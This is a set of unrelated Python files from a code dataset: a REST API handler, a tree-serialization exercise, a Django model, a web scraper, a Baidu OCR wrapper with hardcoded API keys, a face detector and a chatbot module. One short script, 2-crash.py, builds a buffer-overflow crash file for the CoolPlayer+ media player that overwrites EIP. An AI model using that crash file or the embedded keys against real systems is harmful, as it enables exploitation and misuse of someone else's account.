HTTPResponse):\n return result\n # default process\n table_name = getattr(app.views.get(name), '__table__', name)\n kargs['table_name'] = table_name\n if table_name not in app.tables: return fail('404 no such table', status=404)\n try:\n result = await getattr(default_processor, method)(app, request, name, *args, **kargs)\n # post process\n post_proc = getattr(app.views.get(name), 'post_' + method, None)\n if post_proc:\n post_kargs = kargs.copy()\n post_kargs.pop('table_name')\n post_result = await post_proc(app, request, result, *args, **post_kargs)\n if post_result:\n if isinstance(post_result, HTTPResponse): \n return post_result\n else:\n result = post_result\n if not result and method == 'get':\n return fail(status=404)\n #\n return ok(result)\n except Exception as e:\n import traceback\n traceback.print_exc()\n return fail(traceback.format_exc())\n else:\n return fail('404 not found', status=404)\n\n\nmethod_processor_dir = {\n 'GET': 'ls',\n 'POST': 'post',\n}\n\nmethod_processor_item = {\n 'GET': 'get',\n 'PUT': 'put',\n 'DELETE': 'delete',\n}\n\nasync def _proc(request, name, oid=None):\n response = None\n #\n if request.method == 'OPTIONS':\n func = getattr(app.views.get(name), 'options', None)\n if func:\n response = await func(app, request)\n else:\n response = text(None)\n #\n elif not oid and request.method in method_processor_dir:\n response = await _process(method_processor_dir.get(request.method),\n app, request, name)\n elif oid and request.method in method_processor_item:\n response = await _process(method_processor_item.get(request.method),\n app, request, name, oid)\n #\n return response if response else fail('Not impl.', status=400)\n\n\n@bp.route(f'/', methods=['GET', 'POST', 'OPTIONS'])\nasync def process_dir(request, name):\n return await _proc(request, name)\n\n\n@bp.route(f'//', methods=['GET', 'PUT', 'DELETE', 'OPTIONS'])\nasync def process_item(request, name, oid):\n return await _proc(request, name, oid)\n\n\n@bp.middleware('request')\nasync def load_user(request):\n uuid = request.get('uuid')\n if user_loader:\n await user_loader(app, request)\n await logger.info(uuid, inspect.currentframe().f_code.co_name, request.get('user'))\n","sub_path":"trump/restapi.py","file_name":"restapi.py","file_ext":"py","file_size_in_byte":3488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"210951768","text":"'''\nDCP #3\nThis problem was asked by Google.\n\nGiven the root to a binary tree, implement serialize(root), which serializes the tree into a string, and deserialize(s), which deserializes the string back into the tree.\n\nFor example, given the following Node class\n\nclass Node:\n def __init__(self, val, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nThe following test should pass:\n\nnode = Node('root', Node('left', Node('left.left')), Node('right'))\nassert deserialize(serialize(node)).left.left.val == 'left.left'\n'''\n\nclass Node(object):\n def __init__(self, x, left=None, right=None):\n self.val = x\n self.left = left\n self.right = right\n\ndef serialize(root):\n \"\"\"Encodes a tree to a single string.\n :type root: Node\n :rtype: str\n \"\"\"\n if(root==None):\n return \"\"\n def dfs(node):\n if node:\n result.append(str(node.val))\n dfs(node.left)\n dfs(node.right)\n #preorder traversal\n else:\n result.append('-1')\n result = []\n dfs(root)\n #print(result)\n return ' '.join(result)\n \n\ndef deserialize(data):\n \"\"\"Decodes your encoded data to tree.\n :type data: str\n :rtype: Node\n \"\"\"\n if(len(data)==0):\n return None\n def dfs():\n val=next(result)\n if(val == '-1'):\n return None\n else:\n node=Node(val) #reconstructing tree\n node.left=dfs()\n node.right=dfs()\n return node\n result=iter(data.split())\n return dfs()\n\nnode = Node('root', Node('left', Node('left.left')), Node('right'))\nassert deserialize(serialize(node)).left.left.val == 'left.left'","sub_path":"Tree/BinaryTreeSerialization.py","file_name":"BinaryTreeSerialization.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"429190825","text":"#! /usr/bin/python\n\njunk = \"A\" * 260\neip = \"B\" * 4\nfill = \"C\" * (5000-len(junk)-len(eip))\n\nbuffer = junk + eip + fill\n\nf=open(\"exploit.m3u\",\"w\")\nf.write(buffer);\nf.close()\n","sub_path":"CoolPlayer+/2-crash.py","file_name":"2-crash.py","file_ext":"py","file_size_in_byte":172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"635981148","text":"from django.core.validators import MaxLengthValidator\nfrom django.db import models\n\n\nclass ChangeRequest(models.Model):\n \"\"\"\n SNow Change Request Model Class.\n \"\"\"\n\n # The state of the Change Request\n TICKET_STATE_OPEN = '1'\n TICKET_STATE_IN_PROGRESS = '2'\n TICKET_STATE_COMPLETE = '3'\n TICKET_STATE_COMPLETE_WITH_ERRORS = '4'\n TICKET_STATE_CHOICES = (\n (TICKET_STATE_OPEN, 'Open'),\n (TICKET_STATE_IN_PROGRESS, 'In Progress'),\n (TICKET_STATE_COMPLETE, 'Complete'),\n (TICKET_STATE_COMPLETE_WITH_ERRORS, 'Complete With Errors'),\n )\n\n # The 32 character GUID for a SNow record\n sys_id = models.UUIDField(\n max_length=32,\n primary_key=True\n )\n\n number = models.CharField(\n max_length=32,\n help_text=\"The Change Order number\"\n )\n\n title = models.CharField(\n max_length=160, # From the Change Request Title field's maxlength\n help_text=\"Title of the ServiceNow Change Request\"\n )\n\n description = models.TextField(\n # From the Change Request Description's data-length attribute\n validators=[MaxLengthValidator(4000)],\n help_text=\"Description of the ServiceNow Change Request\"\n )\n\n # The GUID of the Group to which the Ticket was assigned to\n assignment_group_guid = models.UUIDField(\n max_length=32\n )\n\n state = models.CharField(\n max_length=max([len(x[0]) for x in TICKET_STATE_CHOICES]),\n choices=TICKET_STATE_CHOICES,\n help_text='The current state the the change order is in.'\n )\n\n def __str__(self):\n return self.number\n\n class Meta:\n verbose_name = 'service-now change request'\n verbose_name_plural = 'service-now change requests'\n","sub_path":"django_snow/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"371866262","text":"import urllib3, urlparse, urllib, time\nfrom scrapy.selector import HtmlXPathSelector\nfrom datetimeutil import unix_time\nimport random\n\n_SITES_RATE_LIMIT = {\n \"mp3.easou.com\" : 1.0,\n 'music.douban.com' : 2.0, \n 'douban.fm' : 2.0, \n 'music.baidu.com' : 2.0, \n }\n\n_SITES_LAST_ACCESS = {}\n\n_NUM_POOLS = 10\n_TIMEOUT = 30\n_DEFAULT_HEADER = {}\n#_DEFAULT_HEADER = {\n# 'Accept' :\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n# 'Accept-Charset' : \"ISO-8859-1,utf-8;q=0.7,*;q=0.3\",\n# 'Accept-Encoding' : \"gzip,deflate,sdch\",\n# 'Accept-Language' : \"en-US,en;q=0.8\",\n# 'Cache-Control' : 'max-age=0',\n# 'Connection' :'keep-alive',\n# 'User-Agent' :\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.162 Safari/535.19\"\n# } \n\n_HTTP = urllib3.PoolManager(num_pools = _NUM_POOLS, timeout = _TIMEOUT)\n_PROXY = {}\n\n\nclass Response(object):\n def __init__(self, status = 200, body = None, headers = {}):\n self.status = status\n self.body = body\n self.headers = headers\n\nclass DownloadException(Exception):\n def __init__(self, status):\n self.status = status \n def __str__(self):\n return \"Status = %s\" % self.status\n \ndef download(url, method = \"GET\", params = {}, body = None, headers = {}, proxys = []): \n if not url:\n raise DownloadException(\"Url is None\")\n \n if isinstance(url, unicode):\n url = url.encode('utf8')\n for k, v in params.iteritems():\n if isinstance(v, unicode):\n params[k] = v.encode('utf8') \n \n if params:\n if method == \"GET\" and url.find('?') == -1: \n url = url + \"?\" + urllib.urlencode(params)\n elif method == \"POST\":\n body = urllib.urlencode(params)\n \n parse = urlparse.urlparse(url) \n site = parse.netloc\n \n if _SITES_RATE_LIMIT.has_key(site):\n global _SITES_LAST_ACCESS\n last_visit = _SITES_LAST_ACCESS.get(site)\n now = unix_time() \n if last_visit:\n waittime = last_visit + _SITES_RATE_LIMIT[site] - now\n if waittime > 0:\n time.sleep(waittime)\n _SITES_LAST_ACCESS[site] = now \n \n \n proxy = proxys[random.randint(0, len(proxys) - 1)] if proxys else None\n\n pool = _HTTP\n if proxy: \n if not _PROXY.has_key(proxy):\n _PROXY[proxy] = urllib3.proxy_from_url(proxy)\n pool = _PROXY[proxy]\n _headers = _DEFAULT_HEADER\n _headers[\"Host\"] = parse.netloc\n for k, v in headers.iteritems():\n if not v and _headers.has_key(k):\n _headers.pop(k)\n else:\n _headers[k] = v \n\n resp = pool.urlopen(method = method, url = url, body = body, headers = _headers)\n resp = process_response(resp)\n if resp.status in [301, 302]:\n redirect_url = resp.headers.get('location')\n resp = download(url = redirect_url, method = method, params = params, body = body, headers = headers, proxy = proxy) \n elif resp.status >= 400:\n raise DownloadException(status = resp.status)\n\n return resp \n \ndef process_response(resp):\n status = resp.status\n headers = resp.headers\n data = resp.data\n \n if status == 200:\n charset = None\n mime_type = None\n m = headers.get('content-type') \n \n if m:\n fields = m.split(';')\n mime_type = fields[0].lower().strip()\n if len(fields) > 1:\n words = fields[1].split('=')\n if len(words) == 2:\n if words[0].lower().strip() == 'charset':\n charset = words[1].strip()\n \n if mime_type == \"text/html\" and not charset:\n try:\n hxs = HtmlXPathSelector(text = data.lower())\n content_type = hxs.select(\"//meta[@http-equiv='content-type']/@content\").extract()[0] \n k, v = content_type.split(';')[1].split('=') \n if k.lower().strip() == 'charset':\n charset = v.strip()\n except:\n pass\n \n if charset:\n try:\n data = unicode(data, charset)\n except:\n if charset.lower() == 'gb2312':\n #try to decode as gbk\n try:\n data = unicode(data, 'gbk')\n except:\n pass\n \n return Response(status = resp.status, headers = headers, body = data) ","sub_path":"contentservice/utils/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"387576838","text":"\"\"\"\nThis script is a face detector using provided pre-trained Haar_cascade\nResults aren't good enough to be used in the future\n\"\"\"\n\nimport numpy as np\nimport os, sys\nimport cv2\nimport CONSTANT\nsys.path.append(CONSTANT.ROOT_DIR)\n\n# Load the xml pre-train cascade classifier\ndef face_region_detector(pic_name):\n face_cascade = cv2.CascadeClassifier(CONSTANT.EMOTION_DIRECTORY_PATH + 'Face_Region_Detection/haar_cascades/haarcascade_frontalface_default.xml')\n\n img = cv2.imread(pic_name)\n # img.resize((CONSTANT.IMAGE_RESIZE_SHAPE[0], CONSTANT.IMAGE_RESIZE_SHAPE[1]))\n\n cv2.waitKey(0)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\n face_rois = [] # Store rectangle(s) which contains face\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)\n roi_gray = gray[y:y + h, x:x + w]\n roi_color = img[y:y + h, x:x + w]\n\n face_rois.append((x, y, x+w, y+h))\n\n # cv2.imshow('img', img)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n return face_rois\n\n# face_region_detector('picture.jpg')\n\n# import numpy as np\n# import cv2\n#\n# face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n#\n# cap = cv2.VideoCapture(0)\n#\n# while 1:\n# ret, img = cap.read()\n# gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n# faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n#\n# for (x, y, w, h) in faces:\n# cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)\n# roi_gray = gray[y:y + h, x:x + w]\n# roi_color = img[y:y + h, x:x + w]\n#\n# cv2.imshow('img', img)\n# k = cv2.waitKey(30) & 0xff\n# if k == 27:\n# break\n#\n# cap.release()\n# cv2.cv2.destroyAllWindows()\n","sub_path":"Face_Region_Detection/face_region_detector.py","file_name":"face_region_detector.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"202614937","text":"import tablib, bs4, urllib, requests, numbers, os\nimport openpyxl\n\ncode_list = [\"001050662\",\"001050661\",\"001050660\",\"001050659\",\"001239125\",\"000700011\"]\ncrawl_list = tablib.Dataset(headers=['Goods name','Brand name','Price','Img URL'])\nbase = os.getcwd()\nif os.path.exists(base+'/WIZWID'):\n pass\nelse:\n os.makedirs(base+'/WIZWID')\n\ndef wizwid_crawl(code,page,idx):\n url = 'https://www.wizwid.com/CSW/handler/wizwid/kr/Catalog-Start?CategoryID={code}&Flag=&OrderType=New&MaxRowNum=1000&PageNO={page}&CouponYn=&SaleYn=&SordOut=&Delivery1=&Delivery2=&RPrice=#browseOptions'.format(code=code,page = page)\n data = requests.get(url)\n # print(data)\n # print(data.text)\n # print(url)\n soup = bs4.BeautifulSoup(data.text,'html.parser')\n base_directory = \"Z:\\메이드트렌\\크롤링데이터/\"\n list_box = soup.find('ul',class_='thumbCatalog clearfix')\n lis = list_box.find_all('li')\n\n for li in lis:\n if lis == []:\n return False\n try:\n img = li.find('img').attrs['src']\n brand = li.find('dd', class_=\"brand\").text.replace(\"\\n\",\"\").replace(\"\\t\",\"\").replace(\"/\",\"\").replace(\"\\\\\",\"\")\n goods = li.find('dd', class_=\"goods\").text.replace(\"\\n\",\"\").replace(\"\\t\",\"\").replace(\"/\",\"\").replace(\"\\\\\",\"\")\n price = li.find('dd', class_=\"price sales\").text.replace(\"\\n\",\"\").replace(\"\\t\",\"\")\n urllib.request.urlretrieve(img, base+\"/WIZWID/IMG{idx}_WIZWID_{brand}_{goods}.jpg\".format(idx=idx,brand=brand,goods=goods))\n crawl_list.append((goods, brand, price, img))\n # print(idx)\n idx += 1\n if idx % 50 == 0:\n # 파일로 만들기\n wb = openpyxl.Workbook()\n sheet = wb.active\n sheet.append(['Goods name','Brand name','Price','Img URL'])\n for row in crawl_list:\n # print(row)\n sheet.append(row)\n wb.save(os.path.join(base + '/WIZWID/메이드트렌_WIZWID.xlsx'))\n print(f\"==========checkPoint: '메이드트렌_WIZWID.xlsx' has been updated==========\")\n # with open(base + '/WIZWID/메이드트렌_WIZWID.xlsx', 'wb') as f:\n # f.write(crawl_list.export('xlsx'))\n\n except KeyboardInterrupt as e:\n pass\n return idx\n\n\ndef run_wizwid_crawl():\n idx =1\n for code in code_list:\n # print(code)\n for page in range(1,10):\n print(page, \"page진행중/\")\n idx = wizwid_crawl(code, page, idx)\n if not idx:\n break\n\n # with open(os.path.join(base + '/WIZWID/메이드트렌_WIZWID.xlsx','wb')) as f :\n # f.write(crawl_list.export('xlsx'))\n\n","sub_path":"pyinstaller_crawling/WIZWID_crawler_copy.py","file_name":"WIZWID_crawler_copy.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"606623684","text":"# 使用百度接口 实现图片中文字识别\nfrom aip import AipOcr\nfrom PIL import Image\nimport numpy as np\nimport time\nimport math\n\n\"\"\" 你的 APPID AK SK \"\"\"\nAPP_ID = '18889232'\nAPI_KEY = 'K5oCCe3hDPZEzx3G1GrNtSg5'\nSECRET_KEY = 'iyLIoxxzhmt3ckVZ19NqBcbKugLM9PE5'\n\n\nclass imgAnal:\n lastTime = 0\n\n # 使用pil转换\n def Tjpg(self, filePath):\n pil_img = Image.open(filePath)\n height, width = pil_img.size\n # 转换为图片数组\n re_img = np.asarray(pil_img)\n re_img = np.require(re_img, dtype=np.uint8, requirements=['O', 'W'])\n re_img.setflags(write=1)\n # 打印原有像素数组\n # print(re_img)\n # 提取alpha通道\n re_img = re_img[:, :, 3:4]\n # reshape\n re_img = re_img.reshape((height, width))\n img = Image.fromarray(re_img)\n # img.show()\n img.save(filePath.replace(\".png\", \".jpg\"))\n return\n\n def get_file_content(self, filePath):\n with open(filePath, 'rb') as fp:\n return fp.read()\n\n @staticmethod\n # 处理毫秒数进位秒数\n def timesqr(s_time: int) -> int:\n return math.ceil(s_time / 1000.0)\n\n # 处理图片后识别\n def rec2(self, filePath):\n self.Tjpg(filePath)\n img = self.get_file_content(filePath.replace(\".png\", \".jpg\"))\n # QPS限制\n nowTime = int(round(time.time() * 1000))\n if nowTime - imgAnal.lastTime < 600:\n time.sleep(imgAnal.timesqr(int(600 - (nowTime - imgAnal.lastTime))))\n client = AipOcr(APP_ID, API_KEY, SECRET_KEY)\n imgAnal.lastTime = nowTime\n # end\n # client.basicGeneral(img)\n res = client.basicAccurate(img)\n if len(res[\"words_result\"]) == 0:\n return filePath.split(\"/\")[-1].split(\".\")[0]\n else:\n return res[\"words_result\"][0][\"words\"]\n\n # 直接识别图片\n def rec(self, filePath):\n img = self.get_file_content(filePath)\n client = AipOcr(APP_ID, API_KEY, SECRET_KEY)\n res = client.basicAccurate(img)\n if len(res[\"words_result\"]) == 0:\n return filePath.split(\"/\")[-1].split(\".\")[0]\n else:\n return res[\"words_result\"]\n\n# print(imgAnal().rec(\"source/tun2tun2.jpg\"))\n","sub_path":"imgAnal.py","file_name":"imgAnal.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"121276300","text":"import sys\n\nsys.path.append('textParsing/textKit/')\nimport findClassBeta ## Beta Version\nimport findSubject\nimport findDate\n#import genTexts\nimport commandsProcess\n\nsys.path.append('textParsing/userData/')\nfrom user import *\nfrom activeUsers import activeUsers\n\nsys.path.append('textParsing/modules/gameKit/')\nimport gameModule\nsys.path.append('textParsing/modules/absenceModule/')\nimport absenceModule\n\nsys.path.append('textParsing/faqsKit/')\nimport faqs\n\nsys.path.append('textParsing/bugReport/')\nimport bugReport\n\nfindDate = findDate.findDate()\nfindSubject = findSubject.findSubject()\nfindClass = findClassBeta.findClass()\n#govorilka = genTexts.genTexts()\nfaqs = faqs.faqs()\nbugReporter = bugReport.bugReporter()\ngameModule = gameModule.GameModule()\nabsenceModule = absenceModule.AbsenceModule()\ncommandProcess = commandsProcess.CommandsProcess(bugReporter)\n\n__speechKit__ = 'exp1'\n__classKit__ = 'Baikal 1.0 Beta'\n__textKit__ = '0.0.3'\n__gameKit__ = '0.0.4'\n__faqsKit__ = '0.0.2'\n__version__ = '0.0.4'\n__build__ = '130518/1640'\n\nprint('start')\n\n# brain.get(user_text)\n# answered => False/True\n# class => [homework, schedule, mark, commands, game, other]\n# date => [YYYYMMDD, next_week, this_week, prev_week, None]\n# subject => [taked from 'data/subjects.csv', None]\n# generatedText => string\n# quickAnswers => array of strings\n\nclass brain:\n MAX_ALLOW_SENTENCES_LEN = 52\n isActiveSpeaker = False\n\n def findAgreement(self, userText):\n yesPatterns = ['да', 'может', 'хорошо', 'ладно', 'давай', 'ок', 'окей']\n noPatterns = ['нет', 'никогда', 'нельзя', 'не']\n\n words = userText.split()\n\n for word in words:\n if (word in yesPatterns):\n return True\n if (word in noPatterns):\n return False\n \n return None\n\n def getUserModule(self, userId):\n if (activeUsers.get(userId) != None):\n return activeUsers.get(userId).activeModule\n return None\n\n def setUserModule(self, userId, moduleName):\n if (activeUsers.get(userId) != None):\n activeUsers.get(userId).activeModule = moduleName\n\n def err_max_len(self):\n return ['Я еще не научился говорить об этом']\n\n def getAnswer(self, answers, quickAnswers, userText):\n resultQuery = list()\n for answer in answers:\n curQuery = {}\n curQuery['answered'] = True\n curQuery['generatedText'] = answer\n resultQuery.append(curQuery)\n\n resultQuery[-1]['quickAnswers'] = quickAnswers\n resultQuery[-1]['agreement'] = self.findAgreement(userText)\n return resultQuery\n\n def generate_answer(self, userId, userText):\n userText = str(userText)\n userText = userText.lower()\n\n if (commandProcess.isCommand(userText)):\n return commandProcess.process(userId, userText)\n\n if (self.getUserModule(userId) == \"game\"):\n status, answer = gameModule.nextStep(userId, userText)\n if (status == 'END'):\n self.setUserModule(userId, None)\n return answer\n\n if (self.getUserModule(userId) == \"lackof\"):\n status, answer = absenceModule.nextStep(userId, userText)\n if (status == 'END'):\n self.setUserModule(userId, None)\n return answer\n\n #FAQS\n botFAQS = faqs.get(userText)\n if botFAQS != None:\n return self.getAnswer([botFAQS], None, userText)\n\n if (len(userText) > self.MAX_ALLOW_SENTENCES_LEN):\n botAnswer = [self.err_max_len()]\n botQuickAnswers = None\n return self.getAnswer(botAnswer, botQuickAnswers, userText)\n\n classType = findClass.get(userText)\n bugReporter.updateHistory(userId, userText, \"\", classType)\n\n if (classType == 'game' or userText == '/game'):\n activeUsers.get(userId).choosingGame()\n self.setUserModule(userId, 'game')\n return self.getAnswer([\"Выбирете игру\"], None, userText)\n\n if (classType == 'lackof'):\n self.setUserModule(userId, classType)\n status, answer = absenceModule.nextStep(userId, userText)\n if (status == 'END'):\n self.setUserModule(userId, None)\n return answer\n\n if (classType == 'other'):\n if self.isActiveSpeaker:\n #botAnswer = [govorilka.get(userText)]\n pass\n else:\n botAnswer = ['Я не знаю, что Вам ответить']\n botQuickAnswers = [bugReporter.botBugReportPhrase]\n bugReporter.updateHistory(userId, userText, botAnswer, classType)\n return self.getAnswer(botAnswer, botQuickAnswers, userText)\n\n curQuery = {}\n curQuery['answered'] = False\n curQuery['class'] = classType\n curQuery['date'] = findDate.get(userText)\n curQuery['subject'] = findSubject.get(userText)\n curQuery['agreement'] = self.findAgreement(userText)\n return [curQuery]\n\n\n def get(self, userId, userText):\n if (activeUsers.get(userId) == None):\n activeUsers.add(userId)\n\n if (activeUsers.get(userId).routines.get(userText) != None):\n routinesActions = activeUsers.get(userId).routines.get(userText)\n resultAnswer = list()\n for action in routinesActions:\n curAns = self.generate_answer(userId, action)\n for answer in curAns:\n resultAnswer.append(answer)\n return resultAnswer\n\n\n return self.generate_answer(userId, userText)\n","sub_path":"textParsing/brain.py","file_name":"brain.py","file_ext":"py","file_size_in_byte":5697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}